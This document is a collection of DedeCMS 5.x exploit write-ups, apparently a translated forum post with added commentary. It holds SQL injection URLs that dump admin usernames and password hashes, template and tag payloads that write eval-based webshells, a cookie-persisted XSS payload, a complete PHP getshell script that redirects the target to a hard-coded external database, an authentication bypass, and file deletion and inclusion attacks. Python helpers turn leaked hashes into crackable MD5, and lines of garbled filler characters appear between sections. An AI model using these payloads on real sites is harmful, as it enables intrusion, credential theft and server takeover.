DedeCMS 5.6 rss.php SQL injection vulnerability
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
Error-based injection through the _Cs array parameter: updatexml() chokes on the non-XPath string and the MySQL error message echoes it back as [uname:hash]. MID(pwd,4,16) cuts the 16-character MD5 out of the 20-character value DedeCMS stores in dede_admin.
DedeCMS v5.6 embedded malicious code execution vulnerability
Register as a member and upload a "software" item; in the local address field enter a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After publishing, viewing or editing the item executes the code.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
This variant writes x.php, a one-line webshell with password xiao: the two base64 strings decode to x.php and <?php eval($_POST[xiao])?>baidu.
Dede 5.6 GBK SQL injection vulnerability
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
DedeCMS V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
The sql parameter is executed as given; %23@__ is #@__, DedeCMS's table-prefix placeholder, which the engine expands to the configured prefix (dede_ by default), so the query dumps the admin table.
DedeCMS all versions gotopage variable XSS vulnerability
1. Copy and paste the URL below into the browser to trigger the XSS and install the "XSS rootkit". Note that IE8/9 block URL-based XSS, so their XSS filter has to be switched off.
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
(The String.fromCharCode payload decodes to JavaScript that stores the same "><script>alert(/xss rootkit!/)</script><x=" string in a cookie named gotopage with a 365-day expiry and then alerts "Xss Rootkit Install Successful !!!!". DedeCMS registers cookie values as globals, so login.php picks up $gotopage from the cookie just as it would from the query string, which is what makes the injection persist.)
2. Close the browser; from then on, visiting any of the URLs below triggers our XSS.
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
http://v57.demo.dedecms.com/dede/login.php

DedeCMS (织梦) variable-overwrite getshell
#!/usr/bin/php -w
<?php
// DedeCMS 5.6 variable-overwrite getshell through plus/mytag_js.php.
// The POST body overwrites cfg_dbhost/cfg_dbuser/cfg_dbpwd/cfg_dbname via
// _COOKIE[GLOBALS][...], so the target connects to a MySQL server the attacker
// controls and renders the dede_mytag row aid=1 from it. That row holds a
// {dede:php} tag that writes the shell and echoes "OK" (see the "tag remote
// file write" section below). Replace the hard-coded database host and
// credentials with your own before use.
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author: www.heixiaozi.com www.webvul.com
');
echo "\r\n";
if (!isset($argv[2])) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache   aid=2 shellpath /   aid=3 shellpath /plus/
Example:
php '.$argv[0].' www.site.com 1 old
+---------------------------------------------------------------------------+
');
    exit;
}
$url  = $argv[1];
$aid  = $argv[2];
$path = isset($argv[3]) ? $argv[3] : '';
$exp  = Getshell($url, $aid, $path);
// The planted {dede:php} tag echoes "OK" once the file is written, so look for
// it in the response body (the original only read the first line of the reply,
// where "200 OK" says nothing about whether the shell was written).
if ($exp !== false && strpos($exp, "OK") !== false) {
    echo "\nExploit Success\n";
    if ($aid == 1) echo "Shell: ".$url."/$path/data/cache/fuck.php\n";
    if ($aid == 2) echo "Shell: ".$url."/$path/fuck.php\n";
    if ($aid == 3) echo "Shell: ".$url."/$path/plus/fuck.php\n";
} else {
    echo "\nExploit Failed\n";
}

function Getshell($url, $aid, $path)
{
    $id   = $aid;
    $host = $url;
    $port = 80;
    // cfg_db* values point at the attacker-controlled MySQL server holding the malicious dede_mytag row
    $content  = "doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
    $data  = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
    $data .= "Host: ".$host."\r\n";
    $data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
    $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    $data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
    //$data .= "Accept-Encoding: gzip,deflate\r\n";
    $data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
    $data .= "Connection: close\r\n";   // keep-alive would make the read loop below wait for the server timeout
    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $data .= "Content-Length: ".strlen($content)."\r\n\r\n";
    $data .= $content;
    $ock = fsockopen($host, $port, $errno, $errstr, 10);
    if (!$ock) {
        echo "\nNo response from ".$host.": $errstr\n";
        return false;
    }
    fwrite($ock, $data);
    $resp = '';
    while (!feof($ock)) {
        $resp .= fgets($ock, 1024);
    }
    fclose($ock);
    // return the body only, so the status line cannot be mistaken for success
    $parts = explode("\r\n\r\n", $resp, 2);
    return isset($parts[1]) ? $parts[1] : '';
}
?>
DedeCMS v5.6-5.7 unauthorized access vulnerability (straight into the admin backend)
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
Replace validate=dcug above with the current captcha value and the request logs you straight into the site backend. The _POST[GLOBALS][cfg_db*] parameters are the same variable overwrite as the mytag_js.php getshell: they point the login at a MySQL server the attacker controls, so the admin/inimda credential check runs against that database instead of the site's own.
This vulnerability requires knowing the backend path (织梦网站后台 in the URL above stands for the site's admin directory).
DedeCMS (织梦) tag remote file write vulnerability
Precondition: you must prepare your own DedeCMS database and insert this row: insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
Then submit with the form below; the shell is 1.php in the same directory. Work out the principle yourself...
What happens: the _COOKIE[GLOBALS][cfg_db*] fields overwrite the target's database settings, so plus/mytag_js.php?aid=1 connects to your database, fetches the dede_mytag row above and renders it, and the {dede:php} body runs on the target. The fwrite() content is what ends up in 1.php.
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction()">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="Submit" name="QuickSearchBtn"><br />
</form>
<script>
// Point the form at the URL typed into the doaction field before submitting
// (the original defined this function but nothing called it).
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>
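The three payloads above (the PHP exploit's _COOKIE[GLOBALS][cfg_dbhost] POST body, the login.php _POST[GLOBALS][cfg_dbhost] query string, and this form) all rely on the same registration loop in DedeCMS 5.6's include/common.inc.php, which turns every key of $_GET, $_POST and $_COOKIE into a global. The block below is an added Python model of that loop and of the 5.7-style fix; it is not DedeCMS's own PHP. The default config values are constructed placeholders, and treating an assignment to the name GLOBALS as a merge into the global table is the model's simplification of the effect the payloads depend on.

```python
import re
from urllib.parse import parse_qsl

# Constructed placeholders standing in for the site's $cfg_* globals.
DEFAULT_GLOBALS = {"cfg_dbhost": "localhost", "cfg_dbuser": "dede",
                   "cfg_dbpwd": "secret", "cfg_dbname": "dede", "cfg_dbprefix": "dede_"}

# 5.6: only the top-level names of $_REQUEST (GET + POST) were screened.
BLOCKED_56 = re.compile(r"^(cfg_|GLOBALS)")
# 5.7: every key at every nesting level, in all three sources, is screened.
BLOCKED_57 = re.compile(r"^(cfg_|GLOBALS|_GET|_POST|_COOKIE)")


def php_parse(query: str) -> dict:
    """Build nested dicts from 'a[b][c]=v&x=y' the way PHP fills $_GET/$_POST
    (simplified: no auto-indexing for empty [] keys)."""
    out = {}
    for key, val in parse_qsl(query, keep_blank_values=True):
        m = re.match(r"([^\[]+)(.*)", key)
        if not m:
            continue
        parts = [m.group(1)] + re.findall(r"\[([^\]]*)\]", m.group(2))
        node = out
        for p in parts[:-1]:
            node = node.setdefault(p, {})
        node[parts[-1]] = val
    return out


def _register(get: dict, post: dict, cookie: dict) -> dict:
    """The loop shared by both versions (${$_k} = $_v for each source, in order).
    Each source array is looked up by name on every iteration, so a key named
    _COOKIE registered from POST replaces the cookie array walked next.
    Model assumption: assigning to the name GLOBALS merges into the global table."""
    g = dict(DEFAULT_GLOBALS)
    g.update({"_GET": get, "_POST": post, "_COOKIE": cookie})
    for source in ("_GET", "_POST", "_COOKIE"):
        src = g[source]
        if not isinstance(src, dict):
            continue
        for k, v in list(src.items()):
            if k == "GLOBALS" and isinstance(v, dict):
                g.update(v)
            else:
                g[k] = v
    return g


def register_56(get: dict, post: dict, cookie: dict) -> dict:
    """Vulnerable: flat screen of GET+POST key names; cookies and nested keys unscreened."""
    for k in list(get) + list(post):
        if BLOCKED_56.match(k):
            raise PermissionError("Request var not allow!")
    return _register(get, post, cookie)


def _check_request(val) -> None:
    """5.7-style CheckRequest: recurse into the keys and values of every array."""
    if isinstance(val, dict):
        for k, v in val.items():
            _check_request(k)
            _check_request(v)
    elif isinstance(val, str) and BLOCKED_57.match(val):
        raise PermissionError("Request var not allow!")


def register_57(get: dict, post: dict, cookie: dict) -> dict:
    """Hardened: every source is screened recursively before registration."""
    for src in (get, post, cookie):
        _check_request(src)
    return _register(get, post, cookie)


if __name__ == "__main__":
    # The mytag_js.php body from the PHP exploit above (host shortened).
    body = ("doaction=http%3A%2F%2Fhost%2Fplus%2Fmytag_js.php%3Faid%3D1"
            "&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114"
            "&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&nocache=true")
    print("5.6 cfg_dbhost:", register_56({}, php_parse(body), {})["cfg_dbhost"])
    try:
        register_57({}, php_parse(body), {})
    except PermissionError as e:
        print("5.7:", e)
```

The 5.7 pattern also rejects plain values that start with cfg_ (because CheckRequest recurses into values as well as keys); the robust fix is simply not to register request data into globals at all.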
Dedecms <= V5.6 Final template execution vulnerability
1. Register a user, go to the member area, publish an article and upload an image; then, in attachment management, replace the image with our crafted template. Say the image name is:
uploads/userup/2/12OMX04-15A.jpg

The template content is (if the image format is checked, prepend GIF89a):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
2. Edit the article just published, view the page source and build a form:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />
<div id="mainCp">
<h3 class="meTitle"><strong>Edit article</strong></h3>
<div class="postForm">
<label>Title:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
<label>Tags:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(separate with commas)
<label>Author:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
<label>Category:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test category</option>
</select> <span style="color:#F00">*</span>(categories shown in colour cannot be selected)
<label>My category:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>Select a category...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>
<label>Summary:</label>
<textarea name="description" id="description">1111111</textarea>
(brief description of the content)
<label>Thumbnail:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
<input type='text' name='templet'
value="../uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields'
value="templet,htmltext;">(crafted here: these two fields make the save store the uploaded file's path as the article's template)
</div>
<!-- form actions -->
<h3 class="meTitle">Content</h3>
<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="&lt;div&gt;&lt;a href=&quot;http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg&quot; target=&quot;_blank&quot;&gt;&lt;img border=&quot;0&quot; alt=&quot;&quot; src=&quot;http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg&quot; width=&quot;1010&quot; height=&quot;456&quot; /&gt;&lt;/a&gt;&lt;/div&gt; &lt;p&gt;&lt;?phpinfo()?&gt;1111111&lt;/p&gt;" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
<label>Captcha:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede/include/vdimgck.php" alt="Can't read it? Click to refresh" align="absmiddle" style="cursor:pointer" />
<button class="button2" type="submit">Submit</button>
<button class="button2 ml10" type="reset">Reset</button>
</div>
</div>
</form>
Submit; if it reports that the edit succeeded, the template path has been changed.
3. Visit the edited article:
Assuming the edited article's aid is 2, just visit:
http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is created in the plus directory (the fopen("1.php") in the template is relative to the rendering script, plus/view.php).
DedeCMS website management system Get Shell vulnerability (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save as 1.gif
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /><br />
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit">Change</button>
</form>

Build the form above; after upload the image is saved as /uploads/userup/3/1.gif.
Publish an article, then build the edit form as follows:
! Q# @ C% g! Y
. d3 I5 ]0 t# f
, B9 c5 p8 {* V8 P% g<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
( F+ i5 R7 l* h3 k4 Y% d<input type="hidden" name="dopost" value="save" /> % m3 W/ Y( _8 d' N1 X* s, j
<input type="hidden" name="aid" value="2" />
8 q0 I: M5 V1 F: q<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" /> $ n: E* c. a5 q, A' v G
<input type="hidden" name="channelid" value="1" />
2 c7 p3 O+ |: |) K% V5 S' B, x0 N: o<input type="hidden" name="oldlitpic" value="" /> & {1 H" A. E- V% M# B
<input type="hidden" name="sortrank" value="1282049150" /> % l$ B! `! g ~, p% n
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/> 1 a) \" C, @' }, G
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
; ]- q* |4 V/ ?<select name='typeid' size='1'> ; _" Q3 l. @6 K% `
<option value='1' class='option3' selected=''>Test</option>
- x% P3 s& E( X" |: [( ~# M<select name='mtypesid' size='1'>
: l0 F& s" s) l<option value='0' selected>请选择分类...</option>
v) D, c# ]0 [5 c& t N<option value='1' class='option3' selected>aa</option></select>
# Q& @7 l: F: Q. I# Z6 ~- R<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
; N3 t3 _" m; g4 k" E P<input type='hidden' name='dede_addonfields' value="templet">
; d9 z9 t; F5 s3 I8 C- \5 w<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
+ V* [7 E; P$ {$ b+ F<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
- b( |4 p. _ F, Y<button class="button2" type="submit">提交</button> " E; b3 P9 n; q7 o( m) v
</form>
DedeCMS (织梦) V5.6 remote file deletion vulnerability
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
The oldface path is not canonicalised before deletion, so the ../ sequences escape the member's upload directory and delete an arbitrary file the web server can write.
DedeCMS (织梦) V5.6 plus/carbuyaction.php local file inclusion vulnerability
http://www.test.com/plus/carbuya ... urn&code=../../
% x4 a' N6 `6 k0 q, v3 v( ^$ p" S+ L
+ S) H9 c5 o' K$ ?$ i( s
. q* h& b U; x* @. K: O5 e
" ^8 B4 K! T" N8 a7 N, f& K" D
" D' C' u" s( G! Q$ H5 O& R. N
W5 `' R2 ]' I# J
- o- T# c4 _7 t* I. ^/ f; d+ O
2 Z f- J/ {$ Q
f( Y6 w/ k. b6 K. M
Password format of the #@__admin rows returned by plus/advancedsearch.php above: the stored value is the 32-character MD5 with the first 5 and last 7 characters removed (20 characters). Strip 3 more from the front and 1 from the end to get the 16-character MD5 that ordinary MD5 crackers accept.
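The hash arithmetic above and the [uname:MID(pwd,4,16)] string leaked by the rss.php updatexml() payload at the top of the page fit together; the block below is an added Python example (not DedeCMS code) that derives the stored 20-character value, converts a leaked value to the crackable 16-character MD5, verifies a candidate password, and parses the leak out of MySQL's XPath error text. The error-message fragment in the usage block is constructed in the shape MySQL returns.

```python
import hashlib
import hmac
import re

# DedeCMS stores an admin password as substr(md5($pwd), 5, 20): the 32-character
# MD5 minus the first 5 and last 7 characters. The plain 16-character MD5 that
# crackers take is md5[8:24], i.e. the stored value minus 3 leading and 1
# trailing character, which is exactly what MID(pwd,4,16) selects.


def dede_admin_hash(password: str) -> str:
    """20-character form stored in #@__admin.pwd."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()[5:25]


def hash20_to_md5_16(hash20: str) -> str:
    """Convert a leaked 20-character value to the 16-character MD5."""
    if not re.fullmatch(r"[0-9a-f]{20}", hash20):
        raise ValueError("not a DedeCMS 20-character admin hash")
    return hash20[3:19]


def md5_16(password: str) -> str:
    """Standard 16-character MD5 (the middle of the 32-character digest)."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()[8:24]


def verify_admin_password(password: str, hash20: str) -> bool:
    """Constant-time comparison of a candidate password against the stored value."""
    return hmac.compare_digest(dede_admin_hash(password), hash20)


def parse_updatexml_leak(error_text: str):
    """Pull (uname, 16-char hash) out of the XPATH syntax error produced by the
    rss.php payload's CONCAT(0x5b, uname, 0x3a, MID(pwd,4,16), 0x5d).
    MySQL shows at most 32 characters of the bad XPath, so [uname:hash] only
    survives intact for a uname of up to 13 characters."""
    m = re.search(r"XPATH syntax error: '\[([^:\]]+):([0-9a-f]{16})\]'", error_text)
    return (m.group(1), m.group(2)) if m else None


if __name__ == "__main__":
    # constructed error fragment in the shape MySQL returns for the payload
    leak = "XPATH syntax error: '[admin:7a57a5a743894a0e]'"
    user, h16 = parse_updatexml_leak(leak)
    print(user, h16, "matches md5_16('admin'):", h16 == md5_16("admin"))
```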
DedeCMS (织梦) 5.1 feedback_js.php injection vulnerability
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
. p) W$ ^, \! H9 D J) m. {
* G% ^! G. W. L: g5 {$ x) j1 O! C; _* J0 m
" n" N5 f6 X9 K7 ]1 [- s; I" }: o8 G6 U @3 G
) i) S1 u# p& n3 Q7 _5 Q
* d( ^, E, H2 p( P) P1 i% _0 V7 F) {2 h
z% ^$ \7 y0 L, x5 P
6 a' d% x5 C/ n( z
DedeCMS (织梦) select_soft_post.php uninitialized variable vulnerability
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action="http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php" method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='OK' />
</form>
<br />It's just an exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Have fun, get a webshell at /data/cache/fly.php...<br />
</body>
</html>
DedeCMS (织梦) 5.3 - 5.5 plus/digg_frame.php injection vulnerability
Exploits a MySQL numeric-overflow error together with the fact that DedeCMS records database errors in a PHP file whose header carries no guard against execution.
1. Visit the URL:
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
An error message is shown.
2. Visit http://www.abc.com/data/mysql_error_trace.php; seeing the following proves the injection succeeded.
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
(The leading int(3) is the var_dump(3) from the injected mid value executing inside the trace file: the */ closes the comment the logger wrapped the error in, and the eval($_POST[x]) that follows it is the webshell.)
3. Run test.html from dede.rar; note that the form's action address is
<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">
After clicking OK, seeing the step-2 output means the webshell was uploaded successfully.
DedeCMS (织梦) plus/infosearch.php injection vulnerability
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
%cf is a GBK lead byte: after the quote is escaped the bytes are %cf%5c%27, a GBK connection reads %cf%5c as one character, and the quote is left unescaped.
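The wide-byte trick behind the %cf' above and the GBK member/index.php injection earlier on the page, as an added Python example (not DedeCMS code): a byte-level addslashes() is applied to the raw input, the result is read under the connection charset, and the quote either survives or not. The hardened routine decodes with the connection charset first and escapes characters rather than bytes. Sample inputs are constructed.

```python
import re


def addslashes(data: bytes) -> bytes:
    """PHP addslashes() on raw request bytes: a backslash before ' " \\ and NUL."""
    out = bytearray()
    for b in data:
        if b in (0x27, 0x22, 0x5C):        # ' " \
            out += b"\\"
            out.append(b)
        elif b == 0:
            out += b"\\0"
        else:
            out.append(b)
    return bytes(out)


# a ' preceded by an even run of backslashes (zero included) is unescaped
UNESCAPED_QUOTE = re.compile(r"(?<!\\)(?:\\\\)*'")


def has_unescaped_quote(text: str) -> bool:
    return UNESCAPED_QUOTE.search(text) is not None


def quote_survives_escaping(raw: bytes, charset: str) -> bool:
    """True when, after addslashes(), a MySQL connection using `charset` still
    sees an unescaped single quote, i.e. the injection goes through."""
    return has_unescaped_quote(addslashes(raw).decode(charset, errors="replace"))


def escape_for_charset(raw: bytes, charset: str) -> bytes:
    """Hardened: decode with the connection charset first (malformed input such as
    a lone GBK lead byte is rejected), escape on characters, then re-encode, so the
    inserted backslash can never be absorbed into a multibyte character."""
    try:
        text = raw.decode(charset)
    except UnicodeDecodeError as e:
        raise ValueError("malformed %s input rejected" % charset) from e
    text = (text.replace("\\", "\\\\").replace("'", "\\'")
                .replace('"', '\\"').replace("\0", "\\0"))
    return text.encode(charset)


if __name__ == "__main__":
    payload = b"\xcf'"                                   # the %cf' from the infosearch.php URL
    print(addslashes(payload))                           # b"\xcf\\'" : 0xCF 0x5C 0x27
    print("gbk  :", quote_survives_escaping(payload, "gbk"))     # True: CF 5C is one GBK character
    print("utf-8:", quote_survives_escaping(payload, "utf-8"))   # False
    try:
        escape_for_charset(payload, "gbk")
    except ValueError as e:
        print("hardened:", e)
```

Setting the client charset on the connection (mysql_set_charset in PHP, or an equivalent in the driver) has the same effect as the hardened routine, because the server-aware escaper then knows which byte pairs form one character.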